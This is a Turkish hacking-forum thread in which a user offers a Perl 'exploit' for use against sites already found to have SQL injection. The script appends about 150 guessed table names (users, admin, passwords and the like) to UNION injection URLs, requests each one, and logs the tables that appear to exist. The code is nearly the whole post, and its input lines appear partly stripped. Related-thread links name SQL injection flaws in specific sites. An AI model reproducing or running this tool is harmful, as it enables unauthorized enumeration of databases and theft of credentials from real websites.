Oturum Aç Kayıt Ol


Reklam Vermek İçin by Cryptr.Org Ads.®
Facebook Paylaş


Goruntuleme Modu Normal Mod | Çizgisel Görünüm
Sql İnjection Php And Asp Tablo Bulucu
 
Konuyu Oyla:
  • Derecelendirme: 3/5 - 5 oy
  • 1
  • 2
  • 3
  • 4
  • 5


Sermandes Çevrimdışı
Editör

Üye no: 2303
Yorumları: 173
Konu Sayısı:
Ülke
Kayıt Tarihi: 14-03-2012
3
Yorum: #1
Award_star_gold_1  Sql İnjection Php And Asp Tablo Bulucu
Reklam Vermek İçin by Cryptr.Org Ads.®
Son zamanların modası olan sql de size büyük bir kolaylık sağlıyacak perl exploiti vereceğim...

örneğin bir sitede sql injection hatası buldunuz tablo adını tahmin edemiyorsunuz ya da uğrasmak istemiyorsunuz bu exploit tam size göre... fazla uzatmadan kodları vereyim...

Exploiti perlde çalıstırabilirsiniz... Konu Hakkında sorusu olan konu altından belirtsin..
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;

print "############################################# #### ########\n";
print "# [Terrorist Crew] #\n";
print "# Türkcelestirme By C4NB4R15~ From Terrorist Crew #\n";
print "# Asp Ve Php Tablo scanner v1.0 #\n";
print "# #\n";
print "# PaNaY1r |CaNB4r!s [cpt] #\n";
print "# Code Started... #\n";
print "############################################# #### ########\n";
print "\n";

print "Menu:\n";
print "\n";

print "1. PHP SQL İNJ TABLO\n";
print "2. ASP SQL İNJ TABLO\n";
print "\n";
print "Opcao: ";
$opcao=;

if ($opcao==1)
{
&PHP
}
if ($opcao==2)
{
&ASP
}

sub PHP

{

print "Sql Taranacak siteyi yazin:\n";
print "Ex: http://www.siteismi.com/index.php?id=-1+...,7,8,9\n\n";
chomp($site = );

if($site !~ /http:\/\//) { $site = "http://$site"; }

@tab= ('+from+usuarios',
'+from+usuario',
'+from+users',
'+from+user',
'+from+login',
'+from+admin',
'+from+tbusuarios',
'+from+tbusuario',
'+from+tbusers',
'+from+tbuser',
'+from+tblogin',
'+from+tbadmin',
'+from+tblusuarios',
'+from+tblusuario',
'+from+tblusers',
'+from+tbluser',
'+from+tbllogin',
'+from+tbladmin',
'+from+tb_usuarios',
'+from+tb_usuario',
'+from+tb_users',
'+from+tb_user',
'+from+tb_login',
'+from+tb_admin',
'+from+tbl_usuarios',
'+from+tbl_usuario',
'+from+tbl_users',
'+from+tbl_user',
'+from+tbl_login',
'+from+tbl_admin',
'+from+tblUsers',
'+from+tblAdmin',
'+from+username',
'+from+usernames',
'+from+name',
'+from+names',
'+from+nombre',
'+from+nombres',
'+from+member',
'+from+members',
'+from+admin_table',
'+from+miembro',
'+from+miembros',
'+from+membername',
'+from+admins',
'+from+administrator',
'+from+administrators',
'+from+passwd',
'+from+password',
'+from+passwords',
'+from+pass',
'+from+Pass',
'+from+tAdmin',
'+from+tadmin',
'+from+user_password',
'+from+user_passwords',
'+from+user_name',
'+from+user_names',
'+from+member_password',
'+from+mods',
'+from+mod',
'+from+moderators',
'+from+moderator',
'+from+user_email',
'+from+user_emails',
'+from+user_mail',
'+from+user_mails',
'+from+mail',
'+from+emails',
'+from+email',
'+from+address',
'+from+e-mail',
'+from+emailaddress',
'+from+correo',
'+from+correos',
'+from+phpbb_users',
'+from+log',
'+from+logins',
'+from+login',
'+from+registers',
'+from+register',
'+from+usr',
'+from+usrs',
'+from+ps',
'+from+pw',
'+from+un',
'+from+u_name',
'+from+u_pass',
'+from+tpassword',
'+from+tPassword',
'+from+u_password',
'+from+nick',
'+from+nicks',
'+from+manager',
'+from+managers',
'+from+administrador',
'+from+tUser',
'+from+tUsers',
'+from+administradores',
'+from+clave',
'+from+login_id',
'+from+pwd',
'+from+pas',
'+from+sistema_id',
'+from+sistema_usuario',
'+from+sistema_password',
'+from+contrasena',
'+from+auth',
'+from+key',
'+from+senha',
'+from+tb_administrator',
'+from+tb_logon',
'+from+tb_members_tb_member',
'+from+tb_userstb_user',
'+from+tb_sys',
'+from+sys',
'+from+fazerlogon',
'+from+logon',
'+from+fazer',
'+from+uthorization',
'+from+membros',
'+from+utilizadores',
'+from+staff',
'+from+nuke_authors',
'+from+accounts',
'+from+account',
'+from+accnts',
'+from+associated',
'+from+accnt',
'+from+customers',
'+from+customer',
'+from+membres',
'+from+administrateur',
'+from+utilisateur',
'+from+tusertusers',
'+from+utilisateurs',
'+from+password',
'+from+amministratore',
'+from+god',
'+from+God',
'+from+authors',
'+from+asociado',
'+from+asociados',
'+from+autores',
'+from+membername',
'+from+autor',
'+from+autores',
'+from+Users',
'+from+Admin',
'+from+Members',
'+from+Miembros',
'+from+Usuario',
'+from+Usuarios',
'+from+ADMIN',
'+from+USERS',
'+from+USER',
'+from+MEMBER',
'+from+MEMBERS',
'+from+USUARIO',
'+from+USUARIOS',
'+from+MIEMBROS',
'+from+MIEMBRO');

print "\Tablolar araniyoooo... Bulunan tablolar asagida listelenecektir....\n\n";

foreach $scan(@tab){

my $url = $site.$scan;
my $ua = LWP::UserAgent->new();
my $req = HTTP::Request->new(GET=>$url);
my $resultado = $ua->request($req);

if ($resultado->content !~ /doesn't exist/ && $resultado->content !~ /You have an error in your SQL syntax./)
{
print "$url\n";
open(a, ">>Union_PHP.txt");
print a "$url\n";
close(a);
}}
print "\bulunan tablolar masaustune Union_PHP.txt olarak kaydedildi.\n";
print "\masaustunden ulasabilirsiniz bulunan tablolarin listelerine\n";
;
}

sub ASP

{

print "Sql Taranacak siteyi yazin:\n";
print "Ex: http://www.siteismi.com/default.asp?id=99\n\n";
chomp($site = );

if($site !~ /http:\/\//) { $site = "http://$site"; }

@tab= ('+union+select+0+from+usuarios',
'+union+select+0+from+usuario',
'+union+select+0+from+users',
'+union+select+0+from+user',
'+union+select+0+from+login',
'+union+select+0+from+admin',
'+union+select+0+from+tbusuarios',
'+union+select+0+from+tbusuario',
'+union+select+0+from+tbusers',
'+union+select+0+from+tbuser',
'+union+select+0+from+tblogin',
'+union+select+0+from+tbadmin',
'+union+select+0+from+tblusuarios',
'+union+select+0+from+tblusuario',
'+union+select+0+from+tblusers',
'+union+select+0+from+tbluser',
'+union+select+0+from+tbllogin',
'+union+select+0+from+tbladmin',
'+union+select+0+from+tb_usuarios',
'+union+select+0+from+tb_usuario',
'+union+select+0+from+tb_users',
'+union+select+0+from+tb_user',
'+union+select+0+from+tb_login',
'+union+select+0+from+tb_admin',
'+union+select+0+from+tbl_usuarios',
'+union+select+0+from+tbl_usuario',
'+union+select+0+from+tbl_users',
'+union+select+0+from+tbl_user',
'+union+select+0+from+tbl_login',
'+union+select+0+from+tbl_admin',
'+union+select+0+from+tblUsers',
'+union+select+0+from+tblAdmin',
'+union+select+0+from+username',
'+union+select+0+from+usernames',
'+union+select+0+from+name',
'+union+select+0+from+names',
'+union+select+0+from+nombre',
'+union+select+0+from+nombres',
'+union+select+0+from+member',
'+union+select+0+from+members',
'+union+select+0+from+admin_table',
'+union+select+0+from+miembro',
'+union+select+0+from+miembros',
'+union+select+0+from+membername',
'+union+select+0+from+admins',
'+union+select+0+from+administrator',
'+union+select+0+from+administrators',
'+union+select+0+from+passwd',
'+union+select+0+from+password',
'+union+select+0+from+passwords',
'+union+select+0+from+pass',
'+union+select+0+from+Pass',
'+union+select+0+from+tAdmin',
'+union+select+0+from+tadmin',
'+union+select+0+from+user_password',
'+union+select+0+from+user_passwords',
'+union+select+0+from+user_name',
'+union+select+0+from+user_names',
'+union+select+0+from+member_password',
'+union+select+0+from+mods',
'+union+select+0+from+mod',
'+union+select+0+from+moderators',
'+union+select+0+from+moderator',
'+union+select+0+from+user_email',
'+union+select+0+from+user_emails',
'+union+select+0+from+user_mail',
'+union+select+0+from+user_mails',
'+union+select+0+from+mail',
'+union+select+0+from+emails',
'+union+select+0+from+email',
'+union+select+0+from+address',
'+union+select+0+from+e-mail',
'+union+select+0+from+emailaddress',
'+union+select+0+from+correo',
'+union+select+0+from+correos',
'+union+select+0+from+phpbb_users',
'+union+select+0+from+log',
'+union+select+0+from+logins',
'+union+select+0+from+login',
'+union+select+0+from+registers',
'+union+select+0+from+register',
'+union+select+0+from+usr',
'+union+select+0+from+usrs',
'+union+select+0+from+ps',
'+union+select+0+from+pw',
'+union+select+0+from+un',
'+union+select+0+from+u_name',
'+union+select+0+from+u_pass',
'+union+select+0+from+tpassword',
'+union+select+0+from+tPassword',
'+union+select+0+from+u_password',
'+union+select+0+from+nick',
'+union+select+0+from+nicks',
'+union+select+0+from+manager',
'+union+select+0+from+managers',
'+union+select+0+from+administrador',
'+union+select+0+from+tUser',
'+union+select+0+from+tUsers',
'+union+select+0+from+administradores',
'+union+select+0+from+clave',
'+union+select+0+from+login_id',
'+union+select+0+from+pwd',
'+union+select+0+from+pas',
'+union+select+0+from+sistema_id',
'+union+select+0+from+sistema_usuario',
'+union+select+0+from+sistema_password',
'+union+select+0+from+contrasena',
'+union+select+0+from+auth',
'+union+select+0+from+key',
'+union+select+0+from+senha',
'+union+select+0+from+tb_administrator',
'+union+select+0+from+tb_logon',
'+union+select+0+from+tb_members_tb_member',
'+union+select+0+from+tb_userstb_user',
'+union+select+0+from+tb_sys',
'+union+select+0+from+sys',
'+union+select+0+from+fazerlogon',
'+union+select+0+from+logon',
'+union+select+0+from+fazer',
'+union+select+0+from+uthorization',
'+union+select+0+from+membros',
'+union+select+0+from+utilizadores',
'+union+select+0+from+staff',
'+union+select+0+from+nuke_authors',
'+union+select+0+from+accounts',
'+union+select+0+from+account',
'+union+select+0+from+accnts',
'+union+select+0+from+associated',
'+union+select+0+from+accnt',
'+union+select+0+from+customers',
'+union+select+0+from+customer',
'+union+select+0+from+membres',
'+union+select+0+from+administrateur',
'+union+select+0+from+utilisateur',
'+union+select+0+from+tusertusers',
'+union+select+0+from+utilisateurs',
'+union+select+0+from+password',
'+union+select+0+from+amministratore',
'+union+select+0+from+god',
'+union+select+0+from+God',
'+union+select+0+from+authors',
'+union+select+0+from+asociado',
'+union+select+0+from+asociados',
'+union+select+0+from+autores',
'+union+select+0+from+membername',
'+union+select+0+from+autor',
'+union+select+0+from+autores',
'+union+select+0+from+Users',
'+union+select+0+from+Admin',
'+union+select+0+from+Members',
'+union+select+0+from+Miembros',
'+union+select+0+from+Usuario',
'+union+select+0+from+Usuarios',
'+union+select+0+from+ADMIN',
'+union+select+0+from+USERS',
'+union+select+0+from+USER',
'+union+select+0+from+MEMBER',
'+union+select+0+from+MEMBERS',
'+union+select+0+from+USUARIO',
'+union+select+0+from+USUARIOS',
'+union+select+0+from+MIEMBROS',
'+union+select+0+from+MIEMBRO');

print "\Tablolar Araniyoooo... Bulunan tablolar asagida listelenecektir....\n\n";

foreach $scan(@tab){

my $url = $site.$scan;
my $ua = LWP::UserAgent->new();
my $req = HTTP::Request->new(GET=>$url);
my $resultado = $ua->request($req);

if ($resultado->content =~ /The number of columns in the two selected tables or queries of a union query do not match./)
{
print "$url\n";
open(a, ">>Union_ASP.txt");
print a "$url\n";
close(a);
}}
print "\Bulunan tablolar masaustune Union_ASP.txt olarak kaydedildi.\n";
print "\masaustunden ulasabilirsiniz bulunan tablolarin listelerine\n";
;
}
19-03-2012, Saat: 03:10
Find all posts by this userAra Like This MessageBeğen Quote this message in a replyAlıntı Yap
ekaba2002 Çevrimdışı
Üye

Üye no: 2806
Yorumları: 265
Konu Sayısı:
Ülke
Kayıt Tarihi: 13-08-2012
0
Yorum: #2
RE: Sql İnjection Php And Asp Tablo Bulucu
Teşekkürler
16-08-2012, Saat: 09:08
Quote this message in a replyWWW Find all posts by this userAra Like This MessageBeğen Quote this message in a replyAlıntı Yap




Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Asp Haber Script sql injection SkyNet 24 4,933 22-01-2017, Saat: 04:19
Son Yorum: tombguard
  The GoNC Network(view.php)Blind Sql Injection Vulnerability SanaLTahriP 1 1,098 16-08-2012, Saat: 09:08
Son Yorum: ekaba2002
  Joomla JDirectory SQL Injection SkyNet 1 904 05-08-2011, Saat: 11:31
Son Yorum: Evillord
  Mueva.eu SQL Injection Vulnerability 3spi0n 0 774 05-08-2011, Saat: 12:16
Son Yorum: 3spi0n
  Design By Taiwan Products SQL Injection Vulnerability 3spi0n 0 743 26-07-2011, Saat: 04:03
Son Yorum: 3spi0n
  THAIWEBCENTER SQL Injection Vulnerability 3spi0n 0 726 26-07-2011, Saat: 03:59
Son Yorum: 3spi0n
  Site Designed & Developed by: Ileys Technology Inc. SQL Injection Vulnerability [view 3spi0n 0 725 26-07-2011, Saat: 03:49
Son Yorum: 3spi0n
  Powered by: Ileys Web Control 2.0 SQL İnjection Vulnerability [view.php] 3spi0n 0 861 25-07-2011, Saat: 08:05
Son Yorum: 3spi0n
  WebSolutions.Ca SQL İnjection [News.php] 3spi0n 0 828 24-07-2011, Saat: 09:04
Son Yorum: 3spi0n
  Argeweb SQL İnjection Vulnerability [Deze Weblog Themes] 3spi0n 0 711 24-07-2011, Saat: 09:01
Son Yorum: 3spi0n

Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
Reklam Vermek İçin by Cryptr.Org Ads.®


NAVİGASYON Tasarım By Ap0x
Copyright © Cryptr.Org 2009 - 2020 All Right Illegal Reserved
Yandex.Metrica
DMCA.com Protection Status